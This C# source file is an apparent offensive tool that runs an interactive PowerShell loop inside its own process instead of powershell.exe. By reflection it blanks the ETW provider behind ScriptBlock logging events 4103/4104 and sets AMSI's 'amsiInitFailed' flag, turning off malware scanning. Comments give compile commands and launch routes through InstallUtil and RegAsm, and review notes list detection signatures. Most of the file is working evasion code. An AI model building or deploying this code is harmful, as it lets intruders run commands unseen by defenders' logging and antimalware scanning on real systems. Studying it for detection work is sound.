csharp: PowerShell without powershell.exe — Transcript Logging Evasion & ScriptBlock Logging Evasion (Event IDs 4103, 4104)




using System;
using System.Collections.ObjectModel;
using System.Management.Automation;
using System.Management.Automation.Security;
using System.Management.Automation.Runspaces;
using System.Reflection;

namespace TranscriptBypass
{
    // Compiling with CSC.exe v4.0.30319 or v3.5
    // C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /out:C:\Temp\posh.exe C:\Temp\posh.cs /reference:System.Management.Automation.dll
    // C:\Windows\Microsoft.NET\Framework\v3.5\csc.exe /out:c:\temp\posh.exe C:\temp\posh.cs /reference:System.Management.Automation.dll

    // Running via InstallUtil.exe
    // C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U C:\temp\posh.exe
    // NOTE(review): InstallUtil /U only invokes Uninstall() on a public Installer-derived class marked [RunInstaller(true)];
    // this listing contains no such class, so as written that command reports no installers and executes nothing.

    // Compiling with CSC.exe v4.0.30319 or v3.5 for use with regasm.exe
    // C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /target:library /out:C:\Temp\posh.dll C:\Temp\posh.cs /reference:System.Management.Automation.dll
    // C:\Windows\Microsoft.NET\Framework\v3.5\csc.exe /target:library /out:c:\temp\posh.dll C:\temp\posh.cs /reference:System.Management.Automation.dll

    // Running via RegAsm.exe
    // C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U C:\temp\posh.dll
    // NOTE(review): regasm /U runs a static method marked [ComUnregisterFunction]; this listing defines none,
    // so as written that command executes nothing. The only entry point actually present here is Main() of the .exe build.

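    /// <summary>
    /// Interactive PowerShell read-eval-print loop hosted in this process through a
    /// System.Management.Automation runspace rather than powershell.exe. Before the
    /// first command it overwrites two static fields of the loaded automation
    /// assembly by reflection: the PowerShell ETW log provider (the provider behind
    /// the 4103/4104 events named in the title) is swapped for one registered under
    /// a random GUID, and AmsiUtils.amsiInitFailed is set to true so AMSI scanning is
    /// skipped. The constrained-language-mode override from the original listing is
    /// left commented out.
    ///
    /// NOTE(review): the bypass is itself observable — System.Management.Automation.dll
    /// loading into a non-PowerShell image, and the literal strings "AmsiUtils" /
    /// "amsiInitFailed" in the binary, are commonly used detection signatures. This
    /// listing does nothing about transcription beyond not running under
    /// powershell.exe; whether that is sufficient depends on the host build — confirm.
    /// </summary>
    public class Program
    {
        /// <summary>Runspace shared by every command; created by startrunspace().</summary>
        public static Runspace newrunspace;

        // True once the static fields have been patched. The patches are process-wide,
        // so repeating them per command (as the original did) only created and leaked
        // one extra EventProvider per command.
        private static bool loggingPatched;

        // Prefix Main() prepends to every input line; InvokeAutomation treats a bare
        // prefix as an empty command. Presumably a harmless expression that keeps the
        // submitted string non-empty — TODO confirm intent.
        private const string InputPrefix = "$a;";

        /// <summary>
        /// Create and open the shared runspace and predefine the $c (command) and
        /// $o (output) variables InvokeAutomation relies on. A runspace left over
        /// from an earlier call is disposed first instead of being leaked.
        /// </summary>
        public static void startrunspace()
        {
            if (newrunspace != null)
            {
                newrunspace.Dispose();
            }
            newrunspace = RunspaceFactory.CreateRunspace();
            newrunspace.Open();
            newrunspace.SessionStateProxy.PSVariable.Set(new PSVariable("c"));
            newrunspace.SessionStateProxy.PSVariable.Set(new PSVariable("o"));
        }

        /// <summary>
        /// Run <paramref name="cmd"/> through Invoke-Expression in the shared runspace
        /// and return its Out-String rendering. A command equal to the bare input
        /// prefix ("$a;") is treated as empty and returns "" without running a pipeline.
        /// </summary>
        /// <param name="cmd">PowerShell source text, already prefixed by Main().</param>
        /// <returns>Out-String text of the command output, or "" when $o is unset.</returns>
        /// <exception cref="InvalidOperationException">startrunspace() has not been called.</exception>
        /// <exception cref="RuntimeException">The script itself failed; propagated from Pipeline.Invoke.</exception>
        public static string InvokeAutomation(string cmd)
        {
            if (newrunspace == null)
            {
                throw new InvalidOperationException("startrunspace() must be called before InvokeAutomation().");
            }

            newrunspace.SessionStateProxy.SetVariable("c", cmd);
            DisableInProcessLogging();

            if (cmd == InputPrefix)
            {
                return "";
            }

            // Pipeline is IDisposable; the original never released it.
            using (Pipeline pipeline = newrunspace.CreatePipeline())
            {
                pipeline.Commands.AddScript("$o = IEX $c | Out-String");
                pipeline.Invoke();
            }

            // $o may be null if the script did not assign it; the original threw
            // NullReferenceException here and printed that instead of the output.
            object output = newrunspace.SessionStateProxy.GetVariable("o");
            return output == null ? "" : output.ToString();
        }

        /// <summary>
        /// Overwrite, by reflection, the two static fields in the loaded
        /// System.Management.Automation assembly that gate ETW logging and AMSI
        /// scanning. Every lookup is null-checked: the type and field names are
        /// private implementation details that differ between PowerShell builds
        /// (older builds predate AMSI and have no AmsiUtils type), and the original
        /// guarded only the ETW lookup, so an AMSI mismatch crashed the command with
        /// a NullReferenceException. A mismatch now leaves that protection in place.
        /// Runs once per process.
        /// </summary>
        private static void DisableInProcessLogging()
        {
            if (loggingPatched)
            {
                return;
            }
            Assembly automation = newrunspace.GetType().Assembly;

            // ETW: replace PSEtwLogProvider.etwProvider with a provider registered under a
            // random, unsubscribed GUID.
            // https://github.com/leechristensen/Random/blob/master/CSharp/DisablePSLogging.cs
            Type psEtwLogProvider = automation.GetType("System.Management.Automation.Tracing.PSEtwLogProvider");
            if (psEtwLogProvider != null)
            {
                FieldInfo etwProvider = psEtwLogProvider.GetField("etwProvider", BindingFlags.NonPublic | BindingFlags.Static);
                if (etwProvider != null)
                {
                    etwProvider.SetValue(null, new System.Diagnostics.Eventing.EventProvider(Guid.NewGuid()));
                }
            }

            // AMSI: mark initialisation as failed so AmsiUtils skips scanning.
            // https://twitter.com/mattifestation/status/735261176745988096?lang=en
            Type amsiUtils = automation.GetType("System.Management.Automation.AmsiUtils");
            if (amsiUtils != null)
            {
                FieldInfo amsiInitFailed = amsiUtils.GetField("amsiInitFailed", BindingFlags.NonPublic | BindingFlags.Static);
                if (amsiInitFailed != null)
                {
                    amsiInitFailed.SetValue(null, true);
                }
            }

            // Constrained-language-mode override from the original listing, left disabled:
            // var fi = typeof(SystemPolicy).GetField("systemLockdownPolicy", BindingFlags.NonPublic | BindingFlags.Static);
            // fi.SetValue(null, SystemEnforcementMode.None);

            loggingPatched = true;
        }

        /// <summary>
        /// Entry point: prompt, read a line, prefix it with "$a;", run it through
        /// InvokeAutomation and print the result; per-command failures print the
        /// exception message and the loop continues. The loop ends when standard
        /// input is closed (ReadLine returns null). The original instead recursed
        /// into Main() on any unexpected error, opening a new runspace each time
        /// and never terminating once stdin hit EOF (ReadLine().Trim() threw on
        /// null, the catch re-entered Main, and so on until stack exhaustion).
        /// </summary>
        public static void Main()
        {
            try
            {
                startrunspace();
            }
            catch (Exception ex)
            {
                Console.WriteLine("Failed to open runspace: " + ex.Message);
                return;
            }

            try
            {
                Console.Write("PS>");
                string line;
                while ((line = Console.ReadLine()) != null)
                {
                    string ps = InputPrefix + line.Trim();
                    try
                    {
                        Console.WriteLine(InvokeAutomation(ps));
                    }
                    catch (Exception ex)
                    {
                        // WriteLine so the next prompt is not glued to the message.
                        Console.WriteLine(ex.Message);
                    }
                    Console.Write("PS>");
                }
            }
            finally
            {
                if (newrunspace != null)
                {
                    newrunspace.Dispose();
                    newrunspace = null;
                }
            }
        }
    }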
}
